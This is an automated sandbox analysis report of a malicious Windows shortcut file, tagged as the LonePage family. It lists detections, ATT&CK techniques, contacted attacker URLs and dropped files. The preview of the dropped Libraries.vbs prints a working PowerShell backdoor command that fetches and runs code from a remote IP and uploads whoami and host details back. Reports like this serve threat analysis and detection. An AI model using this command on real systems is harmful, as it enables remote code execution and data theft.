              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected LonePage
              Source: Yara matchFile source: 00000007.00000002.2442208931.0000026E1AF45000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2442050583.0000026E1AE28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2442050583.0000026E1AE8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2976704530.0000020A282B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2370858356.0000023E33DA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3043184552.0000020A42273000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2370858356.0000023E33DE2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2978895978.0000020A29EB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2442050583.0000026E1AE55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2978895978.0000020A2B879000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3540, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 1056, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3380, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\Public\Libraries\Libraries.vbs, type: DROPPED

              Remote Access Functionality

              barindex
              Yara detected LonePage
              Source: Yara matchFile source: 00000007.00000002.2442208931.0000026E1AF45000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2442050583.0000026E1AE28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2442050583.0000026E1AE8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2976704530.0000020A282B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2370858356.0000023E33DA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3043184552.0000020A42273000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2370858356.0000023E33DE2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2978895978.0000020A29EB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2442050583.0000026E1AE55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2978895978.0000020A2B879000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3540, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 1056, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3380, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\Public\Libraries\Libraries.vbs, type: DROPPED

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information111
              Scripting              		Valid Accounts2
              Command and Scripting Interpreter              		1
              Scheduled Task/Job              		11
              Process Injection              		12
              Masquerading              		OS Credential Dumping11
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Scheduled Task/Job              		111
              Scripting              		1
              Scheduled Task/Job              		31
              Virtualization/Sandbox Evasion              		LSASS Memory11
              Process Discovery              		Remote Desktop ProtocolData from Removable Media11
              Non-Standard Port              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		11
              Process Injection              		Security Account Manager31
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Ingress Tool Transfer              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts4
              PowerShell              		Login Hook1
              Extra Window Memory Injection              		1
              Deobfuscate/Decode Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture1
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Obfuscated Files or Information              		LSA Secrets1
              File and Directory Discovery              		SSHKeylogging1
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Software Packing              		Cached Domain Credentials23
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Extra Window Memory Injection              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              XA5hQdlKVd.lnk47%ReversingLabsDocument-Office.Trojan.LnkDrop
              XA5hQdlKVd.lnk48%VirustotalBrowse

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://oneget.orgX0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://oneget.org0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://147.78.46.40:37662/xsSpQbSOGHyzMLxZ/page164/upgrade.txttrue
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2389679452.0000023E4277D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2389679452.0000023E428B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2370858356.0000023E342E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2978895978.0000020A2B8AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3036412556.0000020A39F23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3036412556.0000020A3A066000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000000.00000002.2370858356.0000023E33E24000.00000004.00000800.00020000.00000000.sdmpfalse
                  		unknown
                  http://147.78.46.40:37662(powershell.exe, 0000000E.00000002.2978895978.0000020A2B4F2000.00000004.00000800.00020000.00000000.sdmpfalse
                    		unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000E.00000002.2978895978.0000020A2A0DD000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000E.00000002.2978895978.0000020A2A0DD000.00000004.00000800.00020000.00000000.sdmpfalse
                      		unknown
                      https://go.micropowershell.exe, 0000000E.00000002.2978895978.0000020A2AB3F000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.mcrosoft.compowershell.exe, 00000000.00000002.2397110961.0000023E4AB46000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://schemas.openxmlfopowershell.exe, 00000000.00000002.2397944415.0000023E4ABBF000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          https://contoso.com/Licensepowershell.exe, 0000000E.00000002.3036412556.0000020A3A066000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://contoso.com/Iconpowershell.exe, 0000000E.00000002.3036412556.0000020A3A066000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 0000000A.00000003.2405283558.0000023B71540000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            http://147.78.46.40:37662powershell.exe, 0000000E.00000002.2978895978.0000020A2B222000.00000004.00000800.00020000.00000000.sdmptrue
                              		unknown
                              http://crl.ver)svchost.exe, 0000000A.00000002.3430811641.0000023B7188B000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://147.78.46.40:37662/xsspqbsoghyzmlxz/page164/upgrade.txtpowershell.exe, 0000000E.00000002.2976613455.0000020A28295000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://147.78.46.40:37662/xsSpQbSpowershell.exe, 0000000E.00000002.2978895978.0000020A2B7BF000.00000004.00000800.00020000.00000000.sdmptrue
                                    		unknown
                                    https://github.com/Pester/Pesterpowershell.exe, 0000000E.00000002.2978895978.0000020A2A0DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://g.live.com/odclientsettings/Prod1C:svchost.exe, 0000000A.00000003.2405283558.0000023B7159E000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://147.78.46.40:43891/page164powershell.exe, 0000000E.00000002.2978895978.0000020A2B879000.00000004.00000800.00020000.00000000.sdmptrue
                                          		unknown
                                          http://crl.microsoftK8powershell.exe, 0000000E.00000002.2976613455.0000020A28295000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://147.78.46.40:37662/xsSpQbSPpowershell.exe, 0000000E.00000002.2978895978.0000020A2B510000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://contoso.com/powershell.exe, 0000000E.00000002.3036412556.0000020A3A066000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2389679452.0000023E4277D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2389679452.0000023E428B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2370858356.0000023E342E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2978895978.0000020A2B8AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3036412556.0000020A39F23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3036412556.0000020A3A066000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://oneget.orgXpowershell.exe, 00000000.00000002.2370858356.0000023E33E24000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://aka.ms/pscore68powershell.exe, 00000000.00000002.2370858356.0000023E32701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2978895978.0000020A29EB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2370858356.0000023E32701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2978895978.0000020A29EB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://oneget.orgpowershell.exe, 00000000.00000002.2370858356.0000023E33E24000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://147.78.46.40:37662Ppowershell.exe, 0000000E.00000002.2978895978.0000020A2B222000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                147.78.46.40
                                                		unknownLebanon
                                                		48847CONNECTLBtrue

                                                Private

                                                IP
                                                127.0.0.1

                                                General Information

                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1522686
                                                Start date and time:2024-09-30 15:30:13 +02:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 5m 57s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:18
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:XA5hQdlKVd.lnk
                                                renamed because original name is a hash value
                                                Original Sample Name:0acd4a9ef18f3fd1ccf440879e768089d4dd2107e1ce19d2a17a59ebed8c7f5d.lnk
                                                Detection:MAL
                                                Classification:mal100.troj.expl.evad.winLNK@12/243@0/2
                                                EGA Information:Failed
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 5
                                                • Number of non-executed functions: 1
                                                Cookbook Comments:
                                                • Found application associated with file extension: .lnk

                                                Warnings

                                                • Exclude process from analysis (whitelisted): dllhost.exe, sppsvc.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                • Excluded IPs from analysis (whitelisted): 52.109.28.46, 52.109.28.47, 52.113.194.132, 184.28.90.27, 52.111.236.32, 52.111.236.35, 52.111.236.33, 52.111.236.34, 104.208.16.92, 95.101.111.168, 95.101.111.179, 2.18.64.224, 2.18.64.220
                                                • Excluded domains from analysis (whitelisted): binaries.templates.cdn.office.net.edgesuite.net, slscr.update.microsoft.com, templatesmetadata.office.net.edgekey.net, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1847.dscg2.akamai.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, onedscolprdcus23.centralus.cloudapp.azure.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, prod.roaming1.live.com.akadns.net, osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, prod1.naturallanguageeditorservice.osi.office.net.akadns.net, uks-azsc-000.roaming.officeapps.live.com, nleditor.osi.office.net, e26769.dscb.akamaiedge.net, prod-eu-resolv
                                                • Execution Graph export aborted for target powershell.exe, PID 3380 because it is empty
                                                • Execution Graph export aborted for target powershell.exe, PID 3540 because it is empty
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtCreateFile calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtSetInformationFile calls found.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                09:31:24API Interceptor259x Sleep call for process: powershell.exe modified
                                                09:31:31API Interceptor2x Sleep call for process: svchost.exe modified
                                                15:31:28Task SchedulerRun new task: ExplorerCoreUpdateTaskMachine path: C:\Users\Public\Libraries\Libraries.vbs

                                                Joe Sandbox View / Context

                                                IPs

                                                No context

                                                Domains

                                                No context

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                CONNECTLBfMymhjLOf5.exeGet hashmaliciousMetasploitBrowse
                                                • 147.78.47.15
                                                6ssgxa2JDE.exeGet hashmaliciousMetasploitBrowse
                                                • 147.78.47.15
                                                http://cdn-serveq.netGet hashmaliciousUnknownBrowse
                                                • 147.78.47.83
                                                bot.x86_64.elfGet hashmaliciousMiraiBrowse
                                                • 185.104.71.197
                                                test2.exeGet hashmaliciousRaccoon Stealer v2Browse
                                                • 147.78.47.232
                                                http://xmas-art.ru/fo/ufmavtiwaehat-sejautfoja/haotwaep/376197/?T=44g47k0c-8q-1q1QZ44igflammatiojb&vfilclszdwwrqimq5-t-nsnba=contyasseursSZ6J2Get hashmaliciousGRQ ScamBrowse
                                                • 147.78.47.217
                                                126UTyCN9uGet hashmaliciousMiraiBrowse
                                                • 193.84.115.25
                                                Tf9ATzpdKRGet hashmaliciousMiraiBrowse
                                                • 185.104.71.198

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):118
                                                Entropy (8bit):3.5700810731231707
                                                Encrypted:false
                                                SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                MD5:573220372DA4ED487441611079B623CD
                                                SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                                                C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1310720
                                                Entropy (8bit):0.7263327363474692
                                                Encrypted:false
                                                SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH09:9JZj5MiKNnNhoxu0
                                                MD5:B82D0FF6B57C3FB24856D25D44D350E6
                                                SHA1:D22CE53BF6113C775F5EDFAE6E8D37BF2430F9D2
                                                SHA-256:2B0F6B8ACED5919FDA6B8AB1E65983A025ACF3A56F85EC7081A384424BED3FDE
                                                SHA-512:A3A3C8B76F742F9D99713A43A2D4AF66833F3D6B5EF07D3D2940DCD37A9B9ED79E317DC96357933110C5CFCA6FE481FFD15D6A0ED0C3F28D165F7BBABEA10262
                                                Malicious:false
                                                Reputation:low
                                                Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:Extensible storage user DataBase, version 0x620, checksum 0xfb2c0f78, page size 16384, DirtyShutdown, Windows version 10.0
                                                Category:dropped
                                                Size (bytes):1310720
                                                Entropy (8bit):0.7555992840959023
                                                Encrypted:false
                                                SSDEEP:1536:lSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:lazaSvGJzYj2UlmOlOL
                                                MD5:644E2A8A48FD74A3FCA7D938143DB263
                                                SHA1:4B6D29985832C86D05384699BD95439FC512ED84
                                                SHA-256:3F41484676E15B0A6E4743B226DB7F5A50D3CEE7E274F81C1E443BFE398B1D3E
                                                SHA-512:172382D63E973E7485FBD9000FCAF7886E002E8BBA5A7AF2D6BBBADDCE5859F106820AFB3D1A44CB98F968DF31A24EAAF4954F05310ECA6311F535B6540BC5D8
                                                Malicious:false
                                                Preview:.,.x... .......7.......X\...;...{......................0.e......!...{?. ....|..h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{.....................................2 ....|.................M... ....|...........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................

                                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):16384
                                                Entropy (8bit):0.08037540598028572
                                                Encrypted:false
                                                SSDEEP:3:gcyYeynsZuhaluNaAPaU1lYoQhttolluxmO+l/SNxOf:gcyzqaluNDPaUgBQgmOH
                                                MD5:8B8DC8D757BE03BEFF855B09FE042C1B
                                                SHA1:78234E00BF2234D6E23C2B16606541A8982664F6
                                                SHA-256:D5BC7348DCEB8858107EFDD24DF745C534B32F77B69D893092A0E0CD90A9F38D
                                                SHA-512:19FEF6E616DB1ED620A43E5B3314E611D558F0B1672A973FCBA35655F4B52EBF5EDE4C1EA2A4079E6CC9D03C841AFDD9250E63F658DC0CE0831BC56FD5035375
                                                Malicious:false
                                                Preview:6........................................;...{.. ....|...!...{?..........!...{?..!...{?..g...!...{?.................M... ....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\Public\Libraries\Libraries.vbs

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with very long lines (600), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):676
                                                Entropy (8bit):5.555395595388922
                                                Encrypted:false
                                                SSDEEP:12:HhFThJMnWRcYaxykOCYqDx6+El6Reoty5LlCmLyf/8wvZeDAttUL27xK4wmwW0yy:B5KXxmCHDx6dloeoQVrL2/8coc7Ui7xa
                                                MD5:28AD6CB8E64A5FBBA779C0B5A58C3148
                                                SHA1:5B7FCC73D2629DD498A926F4A785E0C8B39C050B
                                                SHA-256:6F5F265110490158DF91CA8AD429A96F8AF69CA30B9E3B0D9C11D4FEF74091E8
                                                SHA-512:E306D74C1418052EE43D2DDEF594C923C4947BD8B62A9E368CB2BB1D5FB696E8CCDF39FF3D1AD807F9F2CC1F378928351BBF91DEB776EF098ECC249133A23DC7
                                                Malicious:true
                                                Yara Hits:
                                                • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: C:\Users\Public\Libraries\Libraries.vbs, Author: Joe Security
                                                Preview:dim r, c..set r = createobject("WScript.Shell")..c = "powershell.exe -executionpolicy bypass -w hidden -noprofile -c $iik=new-object net.webclient;$flm=$iik.downloaddata('http://147.78.46.40:37662/xsSpQbSOGHyzMLxZ/page164/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$bjdo+=IEX $jkr|out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};$ujk=new-object net.webclient;$ujk.uploaddata('http://147.78.46.40:43891/page164',$drpy);}"..r.Run c, 0, false........

                                                C:\Users\user\AppData\Local\Microsoft\FontCache\4\CatalogCacheMetaData.xml

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:XML 1.0 document, ASCII text, with very long lines (2008), with no line terminators
                                                Category:dropped
                                                Size (bytes):2008
                                                Entropy (8bit):5.09433331358173
                                                Encrypted:false
                                                SSDEEP:48:cGEh/Odnzy5YdyrB4nzyeiSy30Jdyrh3nzytRdy+GkSyrf1nzybIdywYASyQEdSk:zd2iEu2BbOE92zEebJ2sE7AbHdbmO
                                                MD5:5BFE8F278F65D2A01456DB15F3898802
                                                SHA1:8BD85C6A630FDF0525ABBC61620497F7C16EE25C
                                                SHA-256:8D4007A0C1C36C043903F217A28C0CB31CA00D7FF0926776BBF212F92D501990
                                                SHA-512:70ED69AC7F4E34E4555BA8A7CB804CFA8AD6107977F6E6DB042CC0DCC24BE424992A12430053A2ED2B599EF1EB4383A61D58520FE4A727FDAA671FCF9EEFF6AE
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?><root><version>1</version><Count>13</Count><Resource><Id>Aptos Display_26215680</Id><LAT>2023-10-05T06:31:08Z</LAT><key>23001069669.ttf</key><folder>Aptos Display</folder><type>4</type></Resource><Resource><Id>Aptos_26215680</Id><LAT>2023-10-05T06:31:08Z</LAT><key>29939506207.ttf</key><folder>Aptos</folder><type>4</type></Resource><Resource><Id>Aptos Display_45876480</Id><LAT>2023-10-05T06:31:08Z</LAT><key>30264859306.ttf</key><folder>Aptos Display</folder><type>4</type></Resource><Resource><Id>Aptos Narrow_45876224</Id><LAT>2023-10-05T06:31:08Z</LAT><key>24153076628.ttf</key><folder>Aptos Narrow</folder><type>4</type></Resource><Resource><Id>Aptos_26215682</Id><LAT>2023-10-05T06:31:08Z</LAT><key>31169036496.ttf</key><folder>Aptos</folder><type>4</type></Resource><Resource><Id>Aptos Display_26215682</Id><LAT>2023-10-05T06:31:08Z</LAT><key>28367963232.ttf</key><folder>Aptos Display</folder><type>4</type></Resource><Resource><Id>Apto

                                                C:\Users\user\AppData\Local\Microsoft\FontCache\4\Catalog\ListAll.Json

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):521377
                                                Entropy (8bit):4.9084889265453135
                                                Encrypted:false
                                                SSDEEP:3072:gdTb5Sb3F2FqSrfZm+CnQsbzxZO7aYb6f5780K2:wb5q3umBnzT
                                                MD5:C37972CBD8748E2CA6DA205839B16444
                                                SHA1:9834B46ACF560146DD7EE9086DB6019FBAC13B4E
                                                SHA-256:D4CFBB0E8B9D3E36ECE921B9B51BD37EF1D3195A9CFA1C4586AEA200EB3434A7
                                                SHA-512:02B4D134F84122B6EE9A304D79745A003E71803C354FB01BAF986BD15E3BA57BA5EF167CC444ED67B9BA5964FF5922C50E2E92A8A09862059852ECD9CEF1A900
                                                Malicious:false
